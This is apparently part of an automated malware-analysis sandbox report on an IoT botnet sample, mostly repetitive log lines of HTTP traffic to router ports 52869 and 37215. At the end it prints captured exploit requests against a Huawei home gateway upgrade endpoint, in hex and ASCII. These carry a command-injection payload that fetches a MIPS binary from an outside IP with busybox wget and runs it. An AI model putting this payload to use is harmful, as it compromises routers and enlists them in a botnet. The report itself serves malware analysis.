Source: unknown Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35340 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35342 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54366 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54374 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44238
Source: unknown Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55986 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 55986
Source: unknown Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44272
Source: unknown Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55994 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 55994
Source: unknown Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44284
Source: unknown Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44298
Source: unknown Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34636 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40374 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42590 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59940 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59972 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42590 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50896 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42590 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44306
Source: unknown Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49646 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49652 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46058 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52712 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44382
Source: unknown Network traffic detected: HTTP traffic on port 50896 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44408
Source: unknown Network traffic detected: HTTP traffic on port 59242 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46094 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44422
Source: unknown Network traffic detected: HTTP traffic on port 43858 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52712 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42080 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42098 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48710 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42590 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40854 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 43982 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 50896 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42080 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48710 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42098 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52712 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43858 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44446
Source: unknown Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40854 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44502
Source: unknown Network traffic detected: HTTP traffic on port 52388 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46058 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48904 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42080 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48908 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42098 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48710 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52388 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43858 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46094 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53576 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40854 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 48950 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48956 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 52712 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50896 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52388 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35714 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42080 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57492 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42590 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54088 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42098 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48710 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35714 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58452 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54954 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55490 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58452 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35714 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36620 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43858 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40854 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 36624 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43688 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52388 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54954 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35256 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 55490 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58452 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53576 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40374 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49968 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41516 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43688 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55490 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46058 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 54954 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35714 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58452 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41516 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52712 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46094 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42098 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48710 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42080 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43688 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53568 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41516 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50896 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55490 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53568 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52388 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50284 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50308 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41356 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41358 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54954 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53568 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34414 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 41516 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40854 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 58452 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50308 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43688 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43858 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35384 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34414 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 35484 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55468 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 55468
Source: unknown Network traffic detected: HTTP traffic on port 55476 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40568 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53576 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 55476
Source: unknown Network traffic detected: HTTP traffic on port 35714 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51096 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44976 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42590 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34414 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 51096 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48824 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40568 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53568 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50308 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51096 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48824 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40568 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50284 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55490 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55428 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51096 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45612 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45624 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 59048
Source: unknown Network traffic detected: HTTP traffic on port 59060 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 41378 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34414 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 59060
Source: unknown Network traffic detected: HTTP traffic on port 48824 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55428 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60078 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41378 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41516 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60078 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40568 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55428 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 54010 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51096 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60082 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50308 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41378 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44976 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44352 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44458 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54954 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35318 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35322 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48824 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48710 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44458 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42098 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54010 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53568 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42080 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37108 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 37108
Source: unknown Network traffic detected: HTTP traffic on port 37110 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44458 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52712 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 37110
Source: unknown Network traffic detected: HTTP traffic on port 55428 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54702 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34414 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 43688 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50044 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46058 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44458 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54010 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54738 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41378 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52388 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58452 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45504 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58168 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43210 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47226 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47268 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43218 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34880 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47226 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46094 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50044 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48016 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51472 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51476 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50284 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44352 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 51476
Source: unknown Network traffic detected: HTTP traffic on port 42706 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47392 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45504 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58168 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42746 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42706 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51096 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40568 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 42746
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 42706
Source: unknown Network traffic detected: HTTP traffic on port 50896 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56442 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56468 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44458 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54702 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50044 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58168 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45504 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55428 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35714 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48824 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54738 -> 52869
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 